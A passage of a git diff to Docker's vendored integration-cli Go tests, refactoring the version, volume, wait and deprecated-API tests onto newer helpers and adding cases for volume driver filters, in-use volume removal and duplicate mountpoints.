TestVersionEnsureSucceeds(c *check.C) { - out, _ := dockerCmd(c, "version") - stringsToCheck := map[string]int{ - "Client:": 1, - "Server:": 1, - " Version:": 2, - " API version:": 2, - " Go version:": 2, - " Git commit:": 2, - " OS/Arch:": 2, - " Built:": 2, - } - - for k, v := range stringsToCheck { - c.Assert(strings.Count(out, k), checker.Equals, v, check.Commentf("The count of %v in %s does not match excepted", k, out)) - } -} - -// ensure the Windows daemon return the correct platform string -func (s *DockerSuite) TestVersionPlatform_w(c *check.C) { - testRequires(c, DaemonIsWindows) - testVersionPlatform(c, "windows/amd64") -} - -// ensure the Linux daemon return the correct platform string -func (s *DockerSuite) TestVersionPlatform_l(c *check.C) { - testRequires(c, DaemonIsLinux) - testVersionPlatform(c, "linux") -} - -func testVersionPlatform(c *check.C, platform string) { - out, _ := dockerCmd(c, "version") - expected := "OS/Arch: " + platform - - split := strings.Split(out, "\n") - c.Assert(len(split) >= 14, checker.Equals, true, check.Commentf("got %d lines from version", len(split))) - - // Verify the second 'OS/Arch' matches the platform. 
Experimental has - // more lines of output than 'regular' - bFound := false - for i := 14; i < len(split); i++ { - if strings.Contains(split[i], expected) { - bFound = true - break - } - } - c.Assert(bFound, checker.Equals, true, check.Commentf("Could not find server '%s' in '%s'", expected, out)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go index 61a9413758..340bdfe254 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_volume_test.go @@ -1,6 +1,7 @@ package main import ( + "context" "fmt" "io/ioutil" "os" @@ -8,16 +9,21 @@ import ( "path/filepath" "strings" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestVolumeCLICreate(c *check.C) { dockerCmd(c, "volume", "create") - _, err := runCommand(exec.Command(dockerBinary, "volume", "create", "-d", "nosuchdriver")) - c.Assert(err, check.Not(check.IsNil)) + _, _, err := dockerCmdWithError("volume", "create", "-d", "nosuchdriver") + c.Assert(err, check.NotNil) // test using hidden --name option out, _ := dockerCmd(c, "volume", "create", "--name=test") @@ -31,7 +37,7 @@ func (s *DockerSuite) TestVolumeCLICreate(c *check.C) { func (s *DockerSuite) TestVolumeCLIInspect(c *check.C) { c.Assert( - exec.Command(dockerBinary, "volume", "inspect", "doesntexist").Run(), + exec.Command(dockerBinary, "volume", "inspect", "doesnotexist").Run(), check.Not(check.IsNil), check.Commentf("volume inspect should 
error on non-existent volume"), ) @@ -49,21 +55,18 @@ func (s *DockerSuite) TestVolumeCLIInspect(c *check.C) { func (s *DockerSuite) TestVolumeCLIInspectMulti(c *check.C) { dockerCmd(c, "volume", "create", "test1") dockerCmd(c, "volume", "create", "test2") - dockerCmd(c, "volume", "create", "not-shown") + dockerCmd(c, "volume", "create", "test3") - result := dockerCmdWithResult("volume", "inspect", "--format={{ .Name }}", "test1", "test2", "doesntexist", "not-shown") - c.Assert(result, icmd.Matches, icmd.Expected{ + result := dockerCmdWithResult("volume", "inspect", "--format={{ .Name }}", "test1", "test2", "doesnotexist", "test3") + result.Assert(c, icmd.Expected{ ExitCode: 1, - Err: "No such volume: doesntexist", + Err: "No such volume: doesnotexist", }) out := result.Stdout() - outArr := strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 2, check.Commentf("\n%s", out)) - c.Assert(out, checker.Contains, "test1") c.Assert(out, checker.Contains, "test2") - c.Assert(out, checker.Not(checker.Contains), "not-shown") + c.Assert(out, checker.Contains, "test3") } func (s *DockerSuite) TestVolumeCLILs(c *check.C) { @@ -75,11 +78,8 @@ func (s *DockerSuite) TestVolumeCLILs(c *check.C) { dockerCmd(c, "volume", "create", "soo") dockerCmd(c, "run", "-v", "soo:"+prefix+"/foo", "busybox", "ls", "/") - out, _ := dockerCmd(c, "volume", "ls") - outArr := strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) - - assertVolList(c, out, []string{"aaa", "soo", "test"}) + out, _ := dockerCmd(c, "volume", "ls", "-q") + assertVolumesInList(c, out, []string{"aaa", "soo", "test"}) } func (s *DockerSuite) TestVolumeLsFormat(c *check.C) { @@ -88,12 +88,7 @@ func (s *DockerSuite) TestVolumeLsFormat(c *check.C) { dockerCmd(c, "volume", "create", "soo") out, _ := dockerCmd(c, "volume", "ls", "--format", "{{.Name}}") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - - expected := 
[]string{"aaa", "soo", "test"} - var names []string - names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) + assertVolumesInList(c, out, []string{"aaa", "soo", "test"}) } func (s *DockerSuite) TestVolumeLsFormatDefaultFormat(c *check.C) { @@ -112,12 +107,7 @@ func (s *DockerSuite) TestVolumeLsFormatDefaultFormat(c *check.C) { c.Assert(err, checker.IsNil) out, _ := dockerCmd(c, "--config", d, "volume", "ls") - lines := strings.Split(strings.TrimSpace(string(out)), "\n") - - expected := []string{"aaa default", "soo default", "test default"} - var names []string - names = append(names, lines...) - c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with truncated names: %v, got: %v", expected, names)) + assertVolumesInList(c, out, []string{"aaa default", "soo default", "test default"}) } // assertVolList checks volume retrieved with ls command @@ -136,6 +126,20 @@ func assertVolList(c *check.C, out string, expectVols []string) { c.Assert(volList, checker.DeepEquals, expectVols) } +func assertVolumesInList(c *check.C, out string, expected []string) { + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + for _, expect := range expected { + found := false + for _, v := range lines { + found = v == expect + if found { + break + } + } + c.Assert(found, checker.Equals, true, check.Commentf("Expected volume not found: %v, got: %v", expect, lines)) + } +} + func (s *DockerSuite) TestVolumeCLILsFilterDangling(c *check.C) { prefix, _ := getPrefixAndSlashFromDaemonPlatform() dockerCmd(c, "volume", "create", "testnotinuse1") @@ -182,21 +186,8 @@ func (s *DockerSuite) TestVolumeCLILsFilterDangling(c *check.C) { out, _ = dockerCmd(c, "volume", "ls", "--filter", "name=testisin") c.Assert(out, check.Not(checker.Contains), "testnotinuse1\n", check.Commentf("expected volume 'testnotinuse1' in output")) - c.Assert(out, checker.Contains, 
"testisinuse1\n", check.Commentf("execpeted volume 'testisinuse1' in output")) + c.Assert(out, checker.Contains, "testisinuse1\n", check.Commentf("expected volume 'testisinuse1' in output")) c.Assert(out, checker.Contains, "testisinuse2\n", check.Commentf("expected volume 'testisinuse2' in output")) - - out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=invalidDriver") - outArr := strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) - - out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=local") - outArr = strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) - - out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=loc") - outArr = strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 4, check.Commentf("\n%s", out)) - } func (s *DockerSuite) TestVolumeCLILsErrorWithInvalidFilterName(c *check.C) { @@ -220,17 +211,13 @@ func (s *DockerSuite) TestVolumeCLIRm(c *check.C) { dockerCmd(c, "volume", "rm", id) dockerCmd(c, "volume", "rm", "test") - out, _ = dockerCmd(c, "volume", "ls") - outArr := strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) - volumeID := "testing" dockerCmd(c, "run", "-v", volumeID+":"+prefix+"/foo", "--name=test", "busybox", "sh", "-c", "echo hello > /foo/bar") - out, _, err := runCommandWithOutput(exec.Command(dockerBinary, "volume", "rm", "testing")) - c.Assert( - err, - check.Not(check.IsNil), - check.Commentf("Should not be able to remove volume that is in use by a container\n%s", out)) + + icmd.RunCommand(dockerBinary, "volume", "rm", "testing").Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + }) out, _ = dockerCmd(c, "run", "--volumes-from=test", "--name=test2", "busybox", "sh", "-c", "cat /foo/bar") c.Assert(strings.TrimSpace(out), check.Equals, "hello") @@ -244,12 +231,13 @@ func (s *DockerSuite) 
TestVolumeCLIRm(c *check.C) { dockerCmd(c, "volume", "rm", volumeID) c.Assert( - exec.Command("volume", "rm", "doesntexist").Run(), + exec.Command("volume", "rm", "doesnotexist").Run(), check.Not(check.IsNil), check.Commentf("volume rm should fail with non-existent volume"), ) } +// FIXME(vdemeester) should be a unit test in cli/command/volume package func (s *DockerSuite) TestVolumeCLINoArgs(c *check.C) { out, _ := dockerCmd(c, "volume") // no args should produce the cmd usage output @@ -257,15 +245,20 @@ func (s *DockerSuite) TestVolumeCLINoArgs(c *check.C) { c.Assert(out, checker.Contains, usage) // invalid arg should error and show the command usage on stderr - _, stderr, _, err := runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "somearg")) - c.Assert(err, check.NotNil, check.Commentf(stderr)) - c.Assert(stderr, checker.Contains, usage) + icmd.RunCommand(dockerBinary, "volume", "somearg").Assert(c, icmd.Expected{ + ExitCode: 1, + Error: "exit status 1", + Err: usage, + }) // invalid flag should error and show the flag error and cmd usage - _, stderr, _, err = runCommandWithStdoutStderr(exec.Command(dockerBinary, "volume", "--no-such-flag")) - c.Assert(err, check.NotNil, check.Commentf(stderr)) - c.Assert(stderr, checker.Contains, usage) - c.Assert(stderr, checker.Contains, "unknown flag: --no-such-flag") + result := icmd.RunCommand(dockerBinary, "volume", "--no-such-flag") + result.Assert(c, icmd.Expected{ + ExitCode: 125, + Error: "exit status 125", + Err: usage, + }) + c.Assert(result.Stderr(), checker.Contains, "unknown flag: --no-such-flag") } func (s *DockerSuite) TestVolumeCLIInspectTmplError(c *check.C) { @@ -296,6 +289,7 @@ func (s *DockerSuite) TestVolumeCLICreateWithOpts(c *check.C) { c.Assert(info[4], checker.Equals, "tmpfs") c.Assert(info[5], checker.Contains, "uid=1000") c.Assert(info[5], checker.Contains, "size=1024k") + break } } c.Assert(found, checker.Equals, true) @@ -370,16 +364,43 @@ func (s *DockerSuite) 
TestVolumeCLILsFilterLabels(c *check.C) { c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) } +func (s *DockerSuite) TestVolumeCLILsFilterDrivers(c *check.C) { + // using default volume driver local to create volumes + testVol1 := "testvol-1" + out, _, err := dockerCmdWithError("volume", "create", testVol1) + c.Assert(err, check.IsNil) + + testVol2 := "testvol-2" + out, _, err = dockerCmdWithError("volume", "create", testVol2) + c.Assert(err, check.IsNil) + + // filter with driver=local + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=local") + c.Assert(out, checker.Contains, "testvol-1\n", check.Commentf("expected volume 'testvol-1' in output")) + c.Assert(out, checker.Contains, "testvol-2\n", check.Commentf("expected volume 'testvol-2' in output")) + + // filter with driver=invaliddriver + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=invaliddriver") + outArr := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) + + // filter with driver=loca + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=loca") + outArr = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) + + // filter with driver= + out, _ = dockerCmd(c, "volume", "ls", "--filter", "driver=") + outArr = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(outArr), check.Equals, 1, check.Commentf("\n%s", out)) +} + func (s *DockerSuite) TestVolumeCLIRmForceUsage(c *check.C) { out, _ := dockerCmd(c, "volume", "create") id := strings.TrimSpace(out) dockerCmd(c, "volume", "rm", "-f", id) dockerCmd(c, "volume", "rm", "--force", "nonexist") - - out, _ = dockerCmd(c, "volume", "ls") - outArr := strings.Split(strings.TrimSpace(out), "\n") - c.Assert(len(outArr), check.Equals, 1, check.Commentf("%s\n", out)) } func (s *DockerSuite) TestVolumeCLIRmForce(c *check.C) { @@ -394,15 +415,54 @@ func (s *DockerSuite) TestVolumeCLIRmForce(c 
*check.C) { c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") // Mountpoint is in the form of "/var/lib/docker/volumes/.../_data", removing `/_data` path := strings.TrimSuffix(strings.TrimSpace(out), "/_data") - out, _, err := runCommandWithOutput(exec.Command("rm", "-rf", path)) - c.Assert(err, check.IsNil) + icmd.RunCommand("rm", "-rf", path).Assert(c, icmd.Success) - dockerCmd(c, "volume", "rm", "-f", "test") + dockerCmd(c, "volume", "rm", "-f", name) out, _ = dockerCmd(c, "volume", "ls") c.Assert(out, checker.Not(checker.Contains), name) - dockerCmd(c, "volume", "create", "test") + dockerCmd(c, "volume", "create", name) + out, _ = dockerCmd(c, "volume", "ls") + c.Assert(out, checker.Contains, name) +} + +// TestVolumeCLIRmForceInUse verifies that repeated `docker volume rm -f` calls does not remove a volume +// if it is in use. Test case for https://github.com/docker/docker/issues/31446 +func (s *DockerSuite) TestVolumeCLIRmForceInUse(c *check.C) { + name := "testvolume" + out, _ := dockerCmd(c, "volume", "create", name) + id := strings.TrimSpace(out) + c.Assert(id, checker.Equals, name) + + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + out, e := dockerCmd(c, "create", "-v", "testvolume:"+prefix+slash+"foo", "busybox") + cid := strings.TrimSpace(out) + + _, _, err := dockerCmdWithError("volume", "rm", "-f", name) + c.Assert(err, check.NotNil) + c.Assert(err.Error(), checker.Contains, "volume is in use") out, _ = dockerCmd(c, "volume", "ls") c.Assert(out, checker.Contains, name) + + // The original issue did not _remove_ the volume from the list + // the first time. But a second call to `volume rm` removed it. + // Calling `volume rm` a second time to confirm it's not removed + // when calling twice. 
+ _, _, err = dockerCmdWithError("volume", "rm", "-f", name) + c.Assert(err, check.NotNil) + c.Assert(err.Error(), checker.Contains, "volume is in use") + out, _ = dockerCmd(c, "volume", "ls") + c.Assert(out, checker.Contains, name) + + // Verify removing the volume after the container is removed works + _, e = dockerCmd(c, "rm", cid) + c.Assert(e, check.Equals, 0) + + _, e = dockerCmd(c, "volume", "rm", "-f", name) + c.Assert(e, check.Equals, 0) + + out, e = dockerCmd(c, "volume", "ls") + c.Assert(e, check.Equals, 0) + c.Assert(out, checker.Not(checker.Contains), name) } func (s *DockerSuite) TestVolumeCliInspectWithVolumeOpts(c *check.C) { @@ -425,3 +485,155 @@ func (s *DockerSuite) TestVolumeCliInspectWithVolumeOpts(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k2, v2)) c.Assert(strings.TrimSpace(out), checker.Contains, fmt.Sprintf("%s:%s", k3, v3)) } + +// Test case (1) for 21845: duplicate targets for --volumes-from +func (s *DockerSuite) TestDuplicateMountpointsForVolumesFrom(c *check.C) { + testRequires(c, DaemonIsLinux) + + image := "vimage" + buildImageSuccessfully(c, image, build.WithDockerfile(` + FROM busybox + VOLUME ["/tmp/data"]`)) + + dockerCmd(c, "run", "--name=data1", image, "true") + dockerCmd(c, "run", "--name=data2", image, "true") + + out, _ := dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data1") + data1 := strings.TrimSpace(out) + c.Assert(data1, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data2") + data2 := strings.TrimSpace(out) + c.Assert(data2, checker.Not(checker.Equals), "") + + // Both volume should exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Contains, data1) + c.Assert(strings.TrimSpace(out), checker.Contains, data2) + + out, _, err := dockerCmdWithError("run", "--name=app", "--volumes-from=data1", "--volumes-from=data2", "-d", "busybox", "top") + 
c.Assert(err, checker.IsNil, check.Commentf("Out: %s", out)) + + // Only the second volume will be referenced, this is backward compatible + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "app") + c.Assert(strings.TrimSpace(out), checker.Equals, data2) + + dockerCmd(c, "rm", "-f", "-v", "app") + dockerCmd(c, "rm", "-f", "-v", "data1") + dockerCmd(c, "rm", "-f", "-v", "data2") + + // Both volume should not exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2) +} + +// Test case (2) for 21845: duplicate targets for --volumes-from and -v (bind) +func (s *DockerSuite) TestDuplicateMountpointsForVolumesFromAndBind(c *check.C) { + testRequires(c, DaemonIsLinux) + + image := "vimage" + buildImageSuccessfully(c, image, build.WithDockerfile(` + FROM busybox + VOLUME ["/tmp/data"]`)) + + dockerCmd(c, "run", "--name=data1", image, "true") + dockerCmd(c, "run", "--name=data2", image, "true") + + out, _ := dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data1") + data1 := strings.TrimSpace(out) + c.Assert(data1, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data2") + data2 := strings.TrimSpace(out) + c.Assert(data2, checker.Not(checker.Equals), "") + + // Both volume should exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Contains, data1) + c.Assert(strings.TrimSpace(out), checker.Contains, data2) + + // /tmp/data is automatically created, because we are not using the modern mount API here + out, _, err := dockerCmdWithError("run", "--name=app", "--volumes-from=data1", "--volumes-from=data2", "-v", "/tmp/data:/tmp/data", "-d", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf("Out: %s", out)) + + // No volume will be referenced (mount is /tmp/data), this is backward 
compatible + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "app") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2) + + dockerCmd(c, "rm", "-f", "-v", "app") + dockerCmd(c, "rm", "-f", "-v", "data1") + dockerCmd(c, "rm", "-f", "-v", "data2") + + // Both volume should not exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2) +} + +// Test case (3) for 21845: duplicate targets for --volumes-from and `Mounts` (API only) +func (s *DockerSuite) TestDuplicateMountpointsForVolumesFromAndMounts(c *check.C) { + testRequires(c, SameHostDaemon, DaemonIsLinux) + + image := "vimage" + buildImageSuccessfully(c, image, build.WithDockerfile(` + FROM busybox + VOLUME ["/tmp/data"]`)) + + dockerCmd(c, "run", "--name=data1", image, "true") + dockerCmd(c, "run", "--name=data2", image, "true") + + out, _ := dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data1") + data1 := strings.TrimSpace(out) + c.Assert(data1, checker.Not(checker.Equals), "") + + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "data2") + data2 := strings.TrimSpace(out) + c.Assert(data2, checker.Not(checker.Equals), "") + + // Both volume should exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Contains, data1) + c.Assert(strings.TrimSpace(out), checker.Contains, data2) + + err := os.MkdirAll("/tmp/data", 0755) + c.Assert(err, checker.IsNil) + // Mounts is available in API + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + config := container.Config{ + Cmd: []string{"top"}, + Image: "busybox", + } + + hostConfig := container.HostConfig{ + VolumesFrom: []string{"data1", "data2"}, + Mounts: []mount.Mount{ + { + Type: "bind", + 
Source: "/tmp/data", + Target: "/tmp/data", + }, + }, + } + _, err = cli.ContainerCreate(context.Background(), &config, &hostConfig, &network.NetworkingConfig{}, "app") + + c.Assert(err, checker.IsNil) + + // No volume will be referenced (mount is /tmp/data), this is backward compatible + out, _ = dockerCmd(c, "inspect", "--format", "{{(index .Mounts 0).Name}}", "app") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2) + + dockerCmd(c, "rm", "-f", "-v", "app") + dockerCmd(c, "rm", "-f", "-v", "data1") + dockerCmd(c, "rm", "-f", "-v", "data2") + + // Both volume should not exist + out, _ = dockerCmd(c, "volume", "ls", "-q") + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data1) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Contains), data2) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go index 961aef5525..669e54f1ae 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_wait_test.go @@ -6,8 +6,9 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) // non-blocking wait with 0 exit code @@ -36,7 +37,7 @@ func (s *DockerSuite) TestWaitBlockedExitZero(c *check.C) { chWait := make(chan string) go func() { chWait <- "" - out, _, _ := runCommandWithOutput(exec.Command(dockerBinary, "wait", containerID)) + out := icmd.RunCommand(dockerBinary, "wait", containerID).Combined() chWait <- out }() diff --git a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go index 7bc287eca7..ffb06da40f 100644 --- 
a/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_deprecated_api_v124_test.go @@ -7,7 +7,9 @@ import ( "net/http" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/internal/test/request" "github.com/go-check/check" ) @@ -21,17 +23,24 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartHostConfig(c *check.C) { config := map[string]interface{}{ "Binds": []string{"/aa:/bb"}, } - status, body, err := sockRequest("POST", "/containers/"+name+"/start", config) + res, body, err := request.Post("/containers/"+name+"/start", request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusBadRequest) - c.Assert(string(body), checker.Contains, "was deprecated since v1.10") + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + if versions.GreaterThanOrEqualTo(testEnv.DaemonAPIVersion(), "1.32") { + // assertions below won't work before 1.32 + buf, err := request.ReadBody(body) + c.Assert(err, checker.IsNil) + + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + c.Assert(string(buf), checker.Contains, "was deprecated since API v1.22") + } } func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumeBinds(c *check.C) { // TODO Windows CI: Investigate further why this fails on Windows to Windows CI. 
testRequires(c, DaemonIsLinux) path := "/foo" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { path = `c:\foo` } name := "testing" @@ -40,17 +49,17 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumeBinds(c *check.C) { "Volumes": map[string]struct{}{path: {}}, } - status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + res, _, err := request.Post(formatV123StartAPIURL("/containers/create?name="+name), request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) - bindPath := randomTmpDirPath("test", daemonPlatform) + bindPath := RandomTmpDirPath("test", testEnv.OSType) config = map[string]interface{}{ "Binds": []string{bindPath + ":" + path}, } - status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + res, _, err = request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) pth, err := inspectMountSourceField(name, path) c.Assert(err, checker.IsNil) @@ -67,20 +76,28 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartDupVolumeBinds(c *check.C) "Volumes": map[string]struct{}{"/tmp": {}}, } - status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + res, _, err := request.Post(formatV123StartAPIURL("/containers/create?name="+name), request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) - bindPath1 := randomTmpDirPath("test1", daemonPlatform) - bindPath2 := randomTmpDirPath("test2", daemonPlatform) + bindPath1 := RandomTmpDirPath("test1", testEnv.OSType) + bindPath2 := 
RandomTmpDirPath("test2", testEnv.OSType) config = map[string]interface{}{ "Binds": []string{bindPath1 + ":/tmp", bindPath2 + ":/tmp"}, } - status, body, err := sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + res, body, err := request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.JSONBody(config)) + c.Assert(err, checker.IsNil) + + buf, err := request.ReadBody(body) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError) - c.Assert(string(body), checker.Contains, "Duplicate mount point", check.Commentf("Expected failure due to duplicate bind mounts to same path, instead got: %q with error: %v", string(body), err)) + + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } + c.Assert(string(buf), checker.Contains, "Duplicate mount point", check.Commentf("Expected failure due to duplicate bind mounts to same path, instead got: %q with error: %v", string(buf), err)) } func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumesFrom(c *check.C) { @@ -97,16 +114,16 @@ func (s *DockerSuite) TestDeprecatedContainerAPIStartVolumesFrom(c *check.C) { "Volumes": map[string]struct{}{volPath: {}}, } - status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/create?name="+name), config) + res, _, err := request.Post(formatV123StartAPIURL("/containers/create?name="+name), request.JSONBody(config)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusCreated) + c.Assert(res.StatusCode, checker.Equals, http.StatusCreated) config = map[string]interface{}{ "VolumesFrom": []string{volName}, } - status, _, err = sockRequest("POST", formatV123StartAPIURL("/containers/"+name+"/start"), config) + res, _, err = request.Post(formatV123StartAPIURL("/containers/"+name+"/start"), request.JSONBody(config)) 
c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) pth, err := inspectMountSourceField(name, volPath) c.Assert(err, checker.IsNil) @@ -127,9 +144,9 @@ func (s *DockerSuite) TestDeprecatedPostContainerBindNormalVolume(c *check.C) { dockerCmd(c, "create", "-v", "/foo", "--name=two", "busybox") bindSpec := map[string][]string{"Binds": {fooDir + ":/foo"}} - status, _, err := sockRequest("POST", formatV123StartAPIURL("/containers/two/start"), bindSpec) + res, _, err := request.Post(formatV123StartAPIURL("/containers/two/start"), request.JSONBody(bindSpec)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusNoContent) + c.Assert(res.StatusCode, checker.Equals, http.StatusNoContent) fooDir2, err := inspectMountSourceField("two", "/foo") c.Assert(err, checker.IsNil) @@ -148,11 +165,15 @@ func (s *DockerSuite) TestDeprecatedStartWithTooLowMemoryLimit(c *check.C) { "Memory": 524287 }` - res, body, err := sockRequestRaw("POST", formatV123StartAPIURL("/containers/"+containerID+"/start"), strings.NewReader(config), "application/json") + res, body, err := request.Post(formatV123StartAPIURL("/containers/"+containerID+"/start"), request.RawString(config), request.JSON) c.Assert(err, checker.IsNil) - b, err2 := readBody(body) + b, err2 := request.ReadBody(body) c.Assert(err2, checker.IsNil) - c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + if versions.LessThan(testEnv.DaemonAPIVersion(), "1.32") { + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + } else { + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest) + } c.Assert(string(b), checker.Contains, "Minimum memory limit allowed is 4MB") } @@ -167,7 +188,7 @@ func (s *DockerSuite) TestDeprecatedPostContainersStartWithoutLinksInHostConfig( hc := inspectFieldJSON(c, name, "HostConfig") config := `{"HostConfig":` + hc + `}` - res, b, err := 
